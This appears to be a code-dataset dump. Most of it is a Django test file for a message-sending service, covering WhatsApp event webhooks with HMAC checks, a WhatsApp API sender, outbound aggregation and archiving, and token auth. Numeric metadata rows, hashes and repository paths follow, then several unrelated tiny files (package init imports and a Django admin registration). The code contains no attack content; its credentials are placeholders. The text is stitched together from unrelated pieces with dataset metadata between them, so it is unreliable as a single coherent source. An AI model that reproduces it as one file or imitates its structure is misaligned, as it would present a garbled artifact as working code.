self.assertContains(response, "Attempting to resend 2 messages.")
mock_send_message.assert_any_call(kwargs={"message_id": outbound_id_1})
mock_send_message.assert_any_call(kwargs={"message_id": outbound_id_2})
class TestChannels(AuthenticatedAPITestCase):
def test_channel_default_post_save(self):
new_channel = {
"channel_id": "NEW_DEFAULT",
"channel_type": Channel.JUNEBUG_TYPE,
"default": True,
"configuration": {
"JUNEBUG_API_URL": "http://example.com/",
"JUNEBUG_API_AUTH": ("username", "password"),
"JUNEBUG_API_FROM": "+4321",
},
"concurrency_limit": 0,
"message_timeout": 0,
"message_delay": 0,
}
Channel.objects.create(**new_channel)
self.assertEqual(Channel.objects.filter(default=True).count(), 1)
channel = Channel.objects.get(channel_id="JUNE_VOICE")
channel.default = True
channel.save()
self.assertEqual(Channel.objects.filter(default=True).count(), 1)
class TestUpdateIdentityCommand(AuthenticatedAPITestCase):
def make_identity_lookup(self, msisdn="+27820000123", identity="56f6e9506ee3"):
identity = {"msisdn": msisdn, "identity": identity}
return IdentityLookup.objects.create(**identity)
def prepare_data(self):
self.out1 = self.make_outbound()
self.out2 = self.make_outbound(to_addr="+274321", to_identity="")
self.in1 = self.make_inbound("1234", from_addr="+27820000123")
self.in2 = self.make_inbound("1234", from_addr="+274321")
self.make_identity_lookup()
def check_data(self):
# Outbound with valid msisdn
out1 = Outbound.objects.get(id=self.out1)
self.assertEqual(str(out1.to_addr), "")
self.assertEqual(str(out1.to_identity), "56f6e9506ee3")
# Outbound msisdn not found
out2 = Outbound.objects.get(id=self.out2)
self.assertEqual(str(out2.to_addr), "+274321")
self.assertEqual(str(out2.to_identity), "")
# Inbound with valid msisdn
in1 = Inbound.objects.get(id=self.in1)
self.assertEqual(str(in1.from_addr), "")
self.assertEqual(str(in1.from_identity), "56f6e9506ee3")
# Inbound msisdn not found
in2 = Inbound.objects.get(id=self.in2)
self.assertEqual(str(in2.from_addr), "+274321")
self.assertEqual(str(in2.from_identity), "")
def test_update_identity_no_argument(self):
self.prepare_data()
call_command("update_identity_field")
self.check_data()
def test_update_identity_by_id(self):
self.prepare_data()
call_command("update_identity_field", "--loop", "ID")
self.check_data()
def test_update_identity_by_msg(self):
self.prepare_data()
call_command("update_identity_field", "--loop", "MSG")
self.check_data()
def test_update_identity_by_sql(self):
self.prepare_data()
call_command("update_identity_field", "--loop", "SQL")
self.check_data()
class TestAggregateOutbounds(AuthenticatedAPITestCase):
def test_aggregate_outbounds(self):
"""
The aggregate outbounds task should create new AggregateOutbounds
objects that represent the current Outbounds
"""
c1 = Channel.objects.create(channel_id="c1", configuration={})
c2 = Channel.objects.create(channel_id="c2", configuration={})
o = self.make_outbound(channel=c1)
o = Outbound.objects.get(id=o)
o.created_at = datetime(2017, 1, 1, tzinfo=timezone.utc)
o.attempts = 2
o.save()
o = self.make_outbound(channel=c1)
o = Outbound.objects.get(id=o)
o.created_at = datetime(2017, 1, 1, tzinfo=timezone.utc)
o.save()
o = self.make_outbound(channel=c2)
o = Outbound.objects.get(id=o)
o.created_at = datetime(2017, 1, 1, tzinfo=timezone.utc)
o.save()
o = self.make_outbound(channel=c2)
o = Outbound.objects.get(id=o)
o.created_at = datetime(2017, 1, 1, tzinfo=timezone.utc)
o.delivered = True
o.save()
o = self.make_outbound(channel=c2)
o = Outbound.objects.get(id=o)
o.created_at = datetime(2017, 1, 3, tzinfo=timezone.utc)
o.save()
self.assertNumQueries(4, tasks.aggregate_outbounds("2017-01-01", "2017-01-02"))
agg1 = AggregateOutbounds.objects.get(
date=date(2017, 1, 1), channel=c1, delivered=False
)
self.assertEqual(agg1.total, 2)
self.assertEqual(agg1.attempts, 3)
agg2 = AggregateOutbounds.objects.get(
date=date(2017, 1, 1), channel=c2, delivered=True
)
self.assertEqual(agg2.total, 1)
self.assertEqual(agg2.attempts, 1)
agg3 = AggregateOutbounds.objects.get(
date=date(2017, 1, 1), channel=c2, delivered=False
)
self.assertEqual(agg3.total, 1)
self.assertEqual(agg3.attempts, 1)
self.assertEqual(AggregateOutbounds.objects.count(), 3)
def test_aggregate_outbounds_replace(self):
"""
If the task is run a second time, it should replace all aggregates
with new aggregates.
"""
c = Channel.objects.create(channel_id="c1", configuration={})
for i in range(10):
o = self.make_outbound(channel=c)
o = Outbound.objects.get(id=o)
o.created_at = datetime(2017, 1, 1, tzinfo=timezone.utc)
o.save()
self.assertNumQueries(2, tasks.aggregate_outbounds("2017-01-01", "2017-01-02"))
agg = AggregateOutbounds.objects.get(
date=date(2017, 1, 1), channel=c, delivered=False
)
self.assertEqual(agg.total, 10)
Outbound.objects.all().update(delivered=True)
self.assertNumQueries(2, tasks.aggregate_outbounds("2017-01-01", "2017-01-02"))
agg = AggregateOutbounds.objects.get(
date=date(2017, 1, 1), channel=c, delivered=True
)
self.assertEqual(agg.total, 10)
self.assertEqual(AggregateOutbounds.objects.count(), 1)
@mock.patch("message_sender.views.aggregate_outbounds")
def test_view_defaults(self, task):
"""
Should default to today's date for end, and
AGGREGATE_OUTBOUND_BACKTRACK days in the past for start
"""
response = self.client.post(
"/api/v1/aggregate-outbounds/", content_type="application/json"
)
self.assertEqual(response.status_code, 202)
end = datetime.now().date().isoformat()
start = (datetime.now() - timedelta(30)).date().isoformat()
task.delay.assert_called_once_with(start, end)
@mock.patch("message_sender.views.aggregate_outbounds")
def test_view(self, task):
"""
Should fire the task with the provided parameters
"""
response = self.client.post(
"/api/v1/aggregate-outbounds/",
content_type="application/json",
data=json.dumps({"start": "2017-01-01", "end": "2017-01-03"}),
)
self.assertEqual(response.status_code, 202)
task.delay.assert_called_once_with("2017-01-01", "2017-01-03")
class ArchivedOutboundsTests(AuthenticatedAPITestCase):
def test_task_filename(self):
"""
The filename function should return the appropriate filename
"""
filename = tasks.archive_outbound.filename(datetime(2017, 8, 9).date())
self.assertEqual(filename, "outbounds-2017-08-09.gz")
def test_dump_data(self):
"""
Serializes outbound messages into a gzipped file
"""
o = self.make_outbound()
o = Outbound.objects.get(id=o)
tasks.archive_outbound.dump_data("test.gz", Outbound.objects.all())
with gzip.open("test.gz") as f:
[outbound] = map(lambda l: json.loads(l.decode("utf-8")), f)
outbound.pop("created_at")
outbound.pop("updated_at")
self.assertEqual(
outbound,
{
"attempts": o.attempts,
"call_answered": o.call_answered,
"channel": o.channel_id,
"content": o.content,
"created_by": o.created_by_id,
"delivered": o.delivered,
"id": str(o.id),
"last_sent_time": o.last_sent_time,
"metadata": o.metadata,
"resend": o.resend,
"to_addr": o.to_addr,
"to_identity": o.to_identity,
"updated_by": o.updated_by_id,
"version": o.version,
"vumi_message_id": o.vumi_message_id,
},
)
os.remove("test.gz")
def test_create_archived_outbound(self):
"""
Creates the model with the attached file
"""
with open("test", "w") as f:
f.write("test")
tasks.archive_outbound.create_archived_outbound(
datetime(2017, 8, 9).date(), "test"
)
os.remove("test")
[archive] = ArchivedOutbounds.objects.all()
self.assertEqual(archive.date, datetime(2017, 8, 9).date())
self.assertEqual(archive.archive.read().decode("utf-8"), "test")
def test_task_skips_already_archived(self):
"""
If there is already an ArchivedOutbounds for the given date, then the
task should skip processing that date
"""
with open("test", "w") as f:
f.write("test")
tasks.archive_outbound.create_archived_outbound(
datetime(2017, 8, 9).date(), "test"
)
os.remove("test")
o = self.make_outbound()
o = Outbound.objects.get(id=o)
o.created_at = datetime(2017, 8, 9, tzinfo=timezone.utc)
o.save()
tasks.archive_outbound("2017-08-09", "2017-08-09")
[archive] = ArchivedOutbounds.objects.all()
self.assertEqual(archive.date, datetime(2017, 8, 9).date())
self.assertEqual(archive.archive.read().decode("utf-8"), "test")
self.assertEqual(Outbound.objects.count(), 1)
def test_task_skips_empty_dates(self):
"""
If there are no outbounds for the date, then no archive should be
created
"""
tasks.archive_outbound("2017-08-09", "2017-08-09")
self.assertEqual(ArchivedOutbounds.objects.count(), 0)
def test_task_only_archives_outbounds_for_date(self):
"""
Only outbounds in the specified date range should be archived
"""
o = self.make_outbound()
o = Outbound.objects.get(id=o)
o.created_at = datetime(2017, 8, 9, tzinfo=timezone.utc)
o.save()
o = self.make_outbound()
o = Outbound.objects.get(id=o)
o.created_at = datetime(2017, 8, 10, tzinfo=timezone.utc)
o.save()
self.assertEqual(Outbound.objects.count(), 2)
tasks.archive_outbound("2017-08-09", "2017-08-09")
self.assertEqual(Outbound.objects.count(), 1)
def test_task_creates_archive(self):
"""
The task should serialize the appropriate messages into a gzipped file
"""
o = self.make_outbound()
o = Outbound.objects.get(id=o)
o.created_at = datetime(2017, 8, 9, tzinfo=timezone.utc)
o.save()
o.refresh_from_db()
tasks.archive_outbound("2017-08-09", "2017-08-09")
self.assertEqual(Outbound.objects.count(), 0)
[archive] = ArchivedOutbounds.objects.all()
self.assertEqual(archive.date, datetime(2017, 8, 9).date())
[outbound] = map(
lambda l: json.loads(l.decode("utf-8")),
gzip.GzipFile(fileobj=archive.archive),
)
self.assertEqual(outbound, OutboundArchiveSerializer(o).data)
@mock.patch("message_sender.views.archive_outbound")
def test_view(self, task):
"""
The view should call the task
"""
response = self.client.post(
"/api/v1/archive-outbounds/",
content_type="application/json",
data=json.dumps({"start": "2017-01-01", "end": "2017-01-03"}),
)
self.assertEqual(response.status_code, 202)
task.delay.assert_called_once_with("2017-01-01", "2017-01-03")
class TestWhatsAppEventAPI(AuthenticatedAPITestCase):
def setUp(self):
self.channel = Channel.objects.create(
channel_id="test", configuration={"HMAC_SECRET": "testhmac"}
)
super().setUp()
def generate_signature(self, content):
h = hmac.new(
self.channel.configuration["HMAC_SECRET"].encode(), content.encode(), sha256
)
return base64.b64encode(h.digest()).decode()
def test_event_missing_fields(self):
"""
If there are missing fields in the request, and error response should
be returned, detailing the errors if this was an event and if this was an inbound
"""
data = {"statuses": [{}], "messages": [{}]}
response = self.client.post(
reverse("whatsapp-events", args=[self.channel.channel_id]),
json.dumps(data),
content_type="application/json",
HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(json.dumps(data)),
)
self.assertEqual(
json.loads(response.content.decode()),
{
"accepted": False,
"statuses": [
{
"accepted": False,
"id": None,
"reason": {
"id": ["This field is required."],
"status": ["This field is required."],
"timestamp": ["This field is required."],
},
}
],
"messages": [
{
"accepted": False,
"id": None,
"reason": {
"id": ["This field is required."],
"text": ["This field is required."],
},
}
],
},
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_event_no_message(self):
"""
If we cannot find the message for the event, an error response should
be returned.
"""
event = {
"statuses": [
{
"id": "bad-message-id",
"status": "sent",
"timestamp": "2018-05-04T16:00:18Z",
}
]
}
response = self.client.post(
reverse("whatsapp-events", args=[self.channel.channel_id]),
json.dumps(event),
content_type="application/json",
HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(json.dumps(event)),
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
json.loads(response.content.decode()),
{
"accepted": False,
"messages": [],
"statuses": [
{
"accepted": False,
"reason": "Cannot find message for ID bad-message-id",
"id": "bad-message-id",
}
],
},
)
@patch("message_sender.views.fire_delivery_hook")
def test_event_ack(self, mock_hook):
"""A submitted event should update the message object accordingly."""
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
event = {
"statuses": [
{
"id": d.vumi_message_id,
"status": "sent",
"timestamp": "2018-05-04T16:00:18Z",
}
]
}
response = self.client.post(
reverse("whatsapp-events", args=[self.channel.channel_id]),
json.dumps(event),
content_type="application/json",
HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(json.dumps(event)),
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.delivered, True)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata["ack_timestamp"], "2018-05-04T16:00:18Z")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
),
)
mock_hook.assert_called_once_with(d)
@responses.activate
@patch("message_sender.views.fire_delivery_hook")
def test_event_nack(self, mock_hook):
"""
A rejected event should retry and update the message object accordingly
"""
self.add_metrics_response()
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
post_save.connect(
psh_fire_msg_action_if_new,
sender=Outbound,
dispatch_uid="psh_fire_msg_action_if_new",
)
event = {
"statuses": [
{
"id": d.vumi_message_id,
"status": "failed",
"timestamp": "2018-05-04T16:00:18Z",
}
]
}
response = self.client.post(
reverse("whatsapp-events", args=[self.channel.channel_id]),
json.dumps(event),
content_type="application/json",
HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(json.dumps(event)),
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
c = Outbound.objects.get(pk=existing)
self.assertEqual(c.delivered, False)
self.assertEqual(c.attempts, 2)
self.assertEqual(
True,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123' "
"[session_event: new]"
),
)
mock_hook.assert_called_once_with(d)
@patch("message_sender.views.fire_delivery_hook")
def test_event_delivery_succeeded(self, mock_hook):
"""A successful delivery should update the message accordingly."""
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
event = {
"statuses": [
{
"id": d.vumi_message_id,
"status": "delivered",
"timestamp": "2018-05-04T16:00:18Z",
}
]
}
response = self.client.post(
reverse("whatsapp-events", args=[self.channel.channel_id]),
json.dumps(event),
content_type="application/json",
HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(json.dumps(event)),
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.delivered, True)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata["delivery_timestamp"], "2018-05-04T16:00:18Z")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
),
)
mock_hook.assert_called_once_with(d)
def test_missing_channel(self):
"""
If there's no channel with the specified ID, a 404 response should be returned
"""
response = self.client.post(
reverse("whatsapp-events", args=["badchannel"]),
json.dumps({}),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_missing_hmac_header(self):
"""
If the signature header is missing, the request should not be allowed
"""
response = self.client.post(
reverse("whatsapp-events", args=[self.channel.channel_id]),
json.dumps({}),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(
json.loads(response.content),
{"detail": "X-Engage-Hook-Signature header required"},
)
def test_invalid_hmac_header(self):
"""
If the signature header is invalid, the request should not be allowed
"""
response = self.client.post(
reverse("whatsapp-events", args=[self.channel.channel_id]),
json.dumps({}),
content_type="application/json",
HTTP_X_ENGAGE_HOOK_SIGNATURE="bad-signature",
)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
self.assertEqual(
json.loads(response.content), {"detail": "Invalid hook signature"}
)
@responses.activate
def test_create_inbound(self):
"""
If an inbound message is sent to the event endpoint, then it should be treated
as an inbound message.
"""
responses.add(
responses.POST, "http://metrics-url/metrics/", json={}, status=201
)
identity_uuid = str(uuid.uuid4())
responses.add(
responses.GET,
"{}/identities/search/?details__addresses__msisdn=%2B27820000000".format(
settings.IDENTITY_STORE_URL
),
json={"results": [{"id": identity_uuid}]},
status=200,
match_querystring=True,
)
message_id = str(uuid.uuid4())
post_inbound = {
"messages": [
{
"id": message_id,
"from": "27820000000",
"text": {"body": "Test message"},
}
]
}
response = self.client.post(
reverse("whatsapp-events", args=[self.channel.channel_id]),
json.dumps(post_inbound),
content_type="application/json",
HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(
json.dumps(post_inbound)
),
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Inbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.message_id, message_id)
self.assertEqual(d.from_identity, identity_uuid)
self.assertEqual(d.content, "Test message")
class TestWhatsAppAPISender(TestCase):
def test_send_text_to_send_text_message(self):
"""
send_text should delegate to send_text_message when there is no HSM
setup.
"""
sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
sender.send_text_message = MagicMock(
return_value={"messages": [{"id": "message-id"}]}
)
sender.send_text("+27820001001", "Test message")
sender.send_text_message.assert_called_once_with("27820001001", "Test message")
def test_send_text_to_send_hsm(self):
"""
send_text should delegate to send_hsm when there are HSM config values.
"""
sender = WhatsAppApiSender(
"http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", "ttl"
)
sender.send_hsm = MagicMock(return_value={"messages": [{"id": "message-id"}]})
sender.send_text("+27820001001", "Test message")
sender.send_hsm.assert_called_once_with("27820001001", "Test message")
def test_send_text_to_send_custom_hsm(self):
"""
send_text should delegate to send_custom_hsm when there is a 'template'
key inside the message metadata.
"""
sender = WhatsAppApiSender(
"http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", "ttl"
)
sender.send_custom_hsm = MagicMock(
return_value={"messages": [{"id": "message-id"}]}
)
sender.send_text(
"+27820001001",
"Test message",
metadata={
"template": {
"name": "sbm",
"language": "afr_ZA",
"variables": ["variable1", "variable2"],
}
},
)
sender.send_custom_hsm.assert_called_once_with(
"27820001001", "sbm", "afr_ZA", ["variable1", "variable2"]
)
def test_send_text_unknown_contact(self):
"""
If the sending fails with a unknown contact error, contact_check should
be called then the send should be retried.
"""
sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
sender.get_contact = MagicMock(return_value="27820001001")
sender.send_text_message = MagicMock(
return_value={
"errors": [
{
"code": 1006,
"details": "unknown contact",
"title": "Resource not found",
}
],
"messages": [{"id": "message-id"}],
}
)
sender.send_text("+27820001001", "Test message")
sender.get_contact.assert_called_with("+27820001001")
sender.send_text_message.assert_has_calls(
[call("27820001001", "Test message"), call("27820001001", "Test message")]
)
def test_send_image(self):
"""
send_image should raise an API sender exception as it is not supported
"""
sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
self.assertRaises(
WhatsAppApiSenderException,
sender.send_image,
"+27820001001",
"Test message",
"http://example.jpg",
)
def test_send_voice(self):
"""
send_voice should raise an API sender exception as it is not supported
"""
sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
self.assertRaises(
WhatsAppApiSenderException,
sender.send_voice,
"+27820001001",
"Test message",
"http://example.mp3",
)
def test_fire_metric(self):
"""
fire_metric should raise an API sender exception as it is not supported
"""
sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
self.assertRaises(
WhatsAppApiSenderException, sender.fire_metric, "test.metric", 7
)
@responses.activate
def test_get_contact_exists(self):
"""
get_contact should make the appropriate request to the WhatsApp API, and return
the contact ID.
"""
sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
responses.add(
method=responses.POST,
url="http://whatsapp/v1/contacts",
json={
"contacts": [
{"input": "+27820001001", "status": "valid", "wa_id": "27820001001"}
]
},
status=200,
)
self.assertEqual(sender.get_contact("+27820001001"), "27820001001")
request = responses.calls[-1].request
self.assertEqual(request.headers["Authorization"], "Bearer test-token")
self.assertEqual(
json.loads(request.body), {"blocking": "wait", "contacts": ["+27820001001"]}
)
@responses.activate
def test_get_contact_not_exists(self):
"""
get_contact should make the appropriate request to the WhatsApp API, and trigger
a webhook if the contact doesn't exist
"""
sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
responses.add(
method=responses.POST,
url="http://whatsapp/v1/contacts",
json={"contacts": [{"input": "+27820001001", "status": "invalid"}]},
status=200,
)
user = User.objects.create_user("testuser")
hook = Hook.objects.create(
event="whatsapp.failed_contact_check", target="http://webhook", user=user
)
responses.add(method=responses.POST, url="http://webhook", json={}, status=200)
self.assertEqual(sender.get_contact("+27820001001"), None)
request = responses.calls[-2].request
self.assertEqual(request.headers["Authorization"], "Bearer test-token")
self.assertEqual(
json.loads(request.body), {"blocking": "wait", "contacts": ["+27820001001"]}
)
webhook = responses.calls[-1].request
self.assertEqual(
json.loads(webhook.body),
{"hook": hook.dict(), "data": {"address": "+27820001001"}},
)
@responses.activate
def test_send_hsm(self):
"""
send_hsm should make the appropriate request to the WhatsApp API
"""
sender = WhatsAppApiSender(
"http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", 604800
)
responses.add(
method=responses.POST,
url="http://whatsapp/v1/messages",
json={"messages": [{"id": "message-id"}]},
)
sender.send_hsm("27820001001", "Test message")
request = responses.calls[-1].request
self.assertEqual(request.headers["Authorization"], "Bearer test-token")
self.assertEqual(
json.loads(request.body),
{
"to": "27820001001",
"ttl": 604800,
"type": "hsm",
"hsm": {
"namespace": "hsm-namespace",
"element_name": "hsm-element-name",
"localizable_params": [{"default": "Test message"}],
},
},
)
@responses.activate
def test_send_custom_hsm(self):
"""
send_custom_hsm should make the appropriate request to the WhatsApp API
"""
sender = WhatsAppApiSender(
"http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", 604800
)
responses.add(
method=responses.POST,
url="http://whatsapp/v1/messages",
json={"messages": [{"id": "message-id"}]},
)
sender.send_custom_hsm(
"27820001001", "sbm", "eng_ZA", ["variable1", "variable2"]
)
request = responses.calls[-1].request
self.assertEqual(request.headers["Authorization"], "Bearer test-token")
self.assertEqual(
json.loads(request.body),
{
"to": "27820001001",
"ttl": 604800,
"type": "hsm",
"hsm": {
"namespace": "hsm-namespace",
"element_name": "sbm",
"language": {"policy": "deterministic", "code": "eng_ZA"},
"localizable_params": [
{"default": "variable1"},
{"default": "variable2"},
],
},
},
)
@responses.activate
def test_send_hsm_unknown_contact(self):
"""
send_hsm should return the appropriate body when there is a unknown
contact error returned by the API.
"""
sender = WhatsAppApiSender(
"http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", "ttl"
)
responses.add(
method=responses.POST,
url="http://whatsapp/v1/messages",
json={
"errors": [
{
"code": 1006,
"details": "unknown contact",
"title": "Resource not found",
}
],
"meta": {"version": "2.19.4", "api_status": "stable"},
},
status=404,
)
response = sender.send_hsm("27820001001", "Test message")
self.assertEqual(response["errors"][0]["code"], 1006)
self.assertEqual(response["errors"][0]["details"], "unknown contact")
@responses.activate
def test_send_hsm_http_error(self):
"""
send_hsm should re-raise the HTTPError if it is not handled
"""
sender = WhatsAppApiSender(
"http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", "ttl"
)
responses.add(
method=responses.POST,
url="http://whatsapp/v1/messages",
json={
"errors": [
{
"code": 88,
"details": "broken flux capacitor",
"title": "Resource broken",
}
],
"meta": {"version": "2.19.4", "api_status": "stable"},
},
status=404,
)
self.assertRaises(
requests_exceptions.HTTPError,
sender.send_hsm,
"27820001001",
"Test message",
)
@responses.activate
def test_send_text_message(self):
"""
send_text_message should make the appropriate request to the WhatsApp API
"""
sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
responses.add(
method=responses.POST,
url="http://whatsapp/v1/messages",
json={"messages": [{"id": "message-id"}]},
)
sender.send_text_message("27820001001", "Test message")
request = responses.calls[-1].request
self.assertEqual(request.headers["Authorization"], "Bearer test-token")
self.assertEqual(
json.loads(request.body),
{"to": "27820001001", "text": {"body": "Test message"}},
)
class CachedTokenAuthenticationTests(TestCase):
url = reverse("outbound-list")
def test_auth_required(self):
"""
Ensure that the view we're testing actually requires token auth
"""
r = self.client.get(self.url)
self.assertEqual(r.status_code, status.HTTP_401_UNAUTHORIZED)
def test_caching_working(self):
"""
Ensure that the second time we make a request, there's no database hit
"""
user = User.objects.create_user("test")
token = Token.objects.create(user=user)
with self.assertNumQueries(2):
r = self.client.get(
self.url, HTTP_AUTHORIZATION="Token {}".format(token.key)
)
self.assertEqual(r.status_code, status.HTTP_200_OK)
with self.assertNumQueries(1):
r = self.client.get(
self.url, HTTP_AUTHORIZATION="Token {}".format(token.key)
)
self.assertEqual(r.status_code, status.HTTP_200_OK)
| 36.325429 | 89 | 0.588788 | 17,317 | 160,849 | 5.273373 | 0.047988 | 0.075067 | 0.026106 | 0.021638 | 0.81223 | 0.777407 | 0.745847 | 0.722303 | 0.702559 | 0.683483 | 0 | 0.037972 | 0.289421 | 160,849 | 4,427 | 90 | 36.333635 | 0.760998 | 0.077514 | 0 | 0.643002 | 0 | 0 | 0.189636 | 0.028289 | 0 | 0 | 0 | 0.000226 | 0.162851 | 1 | 0.054767 | false | 0.005506 | 0.010722 | 0.001159 | 0.081715 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
96b8e4a99a5b92e01aed7760b4d6121f84a840b2 | 28 | py | Python | src/stk/serialization/__init__.py | stevenbennett96/stk | 6e5af87625b83e0bfc7243bc42d8c7a860cbeb76 | [
"MIT"
] | 21 | 2018-04-12T16:25:24.000Z | 2022-02-14T23:05:43.000Z | src/stk/serialization/__init__.py | stevenbennett96/stk | 6e5af87625b83e0bfc7243bc42d8c7a860cbeb76 | [
"MIT"
] | 8 | 2019-03-19T12:36:36.000Z | 2020-11-11T12:46:00.000Z | src/stk/serialization/__init__.py | stevenbennett96/stk | 6e5af87625b83e0bfc7243bc42d8c7a860cbeb76 | [
"MIT"
] | 5 | 2018-08-07T13:00:16.000Z | 2021-11-01T00:55:10.000Z | from .json import * # noqa
| 14 | 27 | 0.642857 | 4 | 28 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 28 | 1 | 28 | 28 | 0.857143 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7379a66f70f56e1e445af6d3ed36a1797d2ccf11 | 27 | py | Python | supsmu/__init__.py | jakevdp/supsmu | c9763dd7f5dbe1b037fb78b1378edc64b945ec35 | [
"CNRI-Python"
] | 5 | 2015-01-27T21:28:09.000Z | 2021-08-29T05:58:13.000Z | supsmu/__init__.py | jakevdp/supsmu | c9763dd7f5dbe1b037fb78b1378edc64b945ec35 | [
"CNRI-Python"
] | null | null | null | supsmu/__init__.py | jakevdp/supsmu | c9763dd7f5dbe1b037fb78b1378edc64b945ec35 | [
"CNRI-Python"
] | 1 | 2021-08-29T05:58:14.000Z | 2021-08-29T05:58:14.000Z | from .supsmu import supsmu
| 13.5 | 26 | 0.814815 | 4 | 27 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fbd6bf5bfda1fd7636762e23d78a4dfb9a6bcd6e | 29 | py | Python | pynars/NARS/__init__.py | AIxer/PyNARS | 443b6a5e1c9779a1b861df1ca51ce5a190998d2e | [
"MIT"
] | null | null | null | pynars/NARS/__init__.py | AIxer/PyNARS | 443b6a5e1c9779a1b861df1ca51ce5a190998d2e | [
"MIT"
] | null | null | null | pynars/NARS/__init__.py | AIxer/PyNARS | 443b6a5e1c9779a1b861df1ca51ce5a190998d2e | [
"MIT"
] | null | null | null | from .Control import Reasoner | 29 | 29 | 0.862069 | 4 | 29 | 6.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 29 | 1 | 29 | 29 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
838c59be6ae74bd13ed293ede3c7ce802f29c3bc | 174 | py | Python | src/tvmserver/admin.py | rxvt/basic_tvm | 4c1a5d5b39f0b0be28c5f1e62c56d148d1db1653 | [
"MIT"
] | null | null | null | src/tvmserver/admin.py | rxvt/basic_tvm | 4c1a5d5b39f0b0be28c5f1e62c56d148d1db1653 | [
"MIT"
] | null | null | null | src/tvmserver/admin.py | rxvt/basic_tvm | 4c1a5d5b39f0b0be28c5f1e62c56d148d1db1653 | [
"MIT"
] | null | null | null | from django.contrib import admin
from tvmserver.models import Command
# Register your models here.
@admin.register(Command)
class CommandAdmin(admin.ModelAdmin):
pass
